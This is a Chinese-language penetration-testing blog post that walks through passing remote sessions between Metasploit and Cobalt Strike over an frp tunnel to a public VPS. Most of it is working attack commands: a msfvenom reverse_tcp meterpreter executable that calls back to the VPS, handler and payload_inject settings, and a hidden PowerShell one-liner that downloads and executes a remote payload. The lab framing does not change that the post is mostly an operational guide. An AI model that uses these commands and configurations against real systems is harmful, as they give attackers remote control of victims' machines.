很糙的写一下,利用公网进行内网msf接收公网cs派生session。
在去年任务比较多,挖掘内网往往没利用msf进行渗透,只用cs进行渗透是比较麻烦的,做渗透还是用msf比较舒服。
实验环境:
VPS:windows 2008 R2 IP:123.56.xx.xx
靶机:windows 7 IP:192.168.138.150
攻击机:kali 2019.04 IP:192.168.243.129
实验工具:
vps:cs 3.14 、frp、木马
靶机:cs木马、msf木马
攻击机:frp、msfconsole、cs 3.14客户端
前提是getshell。或者利用cs远程木马上线等等,直接是测试cs和msf之间的session派生。
目录:
一、利用msf上线靶机
二、利用msf给cs派生session
三、利用cs上线靶机
四、利用cs给msf派生session
五、总结
一、利用msf上线靶机
讲解:利用frp将内网一个端口给映射到公网IP;在利用msfvenom生成msf木马;
Frp映射端口:
Kali端:(frpc.ini)
[common] server_addr = 123.56.xx.xx server_port = 7000 [socks5_2] type = tcp local_ip = 127.0.0.1 local_port = 1212 remote_port = 1212
Vps端:
不需要配置,直接运行:
./frps -c frps.ini
Kali端运行:
生成msf木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.56.xx.xx LPORT=1212 -f exe > /root/test.exe
上msf配置模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 123.56.xx.xx
set lport 1212
run
靶机:
运行test.exe
攻击机Kali:(msf收到session)
二、利用msf给cs派生session
Kali:
Session 1
cs配置:
Msf配置:
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true set lhost 123.56.xx.xx #cobaltstrike监听的ip set lport 12121 #cobaltstrike监听的端口 set session 1 #这里是获得的session的id run
已经派生成功。
一般收集信息还是用msf进行信息收集,msf功能较强大。Cs用来上线主机,支持远程木马上传。
三、利用cs上线靶机
frp端口映射:
Kali端:(frpc.ini)
[common] server_addr = 123.56.xx.xx server_port = 7000 [socks5_2] type = tcp local_ip = 127.0.0.1 # 本地kali地址。 local_port = 1212 remote_port = 1212
生成cs远程木马:
生成powershell木马。使用是winds 7存在powershell。
设置远程木马下载:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://123.56.xx.xx:803/a'))"
成功上线:
四、利用cs给msf派生session
Smf配置:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.243.129#需设置本地IP地址 set lport 1212 run
CS配置:
成功页面不在截图,忘记截图了,监听就能直接过来了。
五、总结
1、kali中的ip需要设置本地ip
2、利用frp作为端口转发,端口设置需要配置好
3、在进行cs派生的时候遇到问题,就是派生不过来,最后利用腾讯云服务器成功派生
4、cs中的派生模块和kali中msf模块需要一致,例如:用http就都需要设置,用tcp都需要一样
比较菜,多见谅。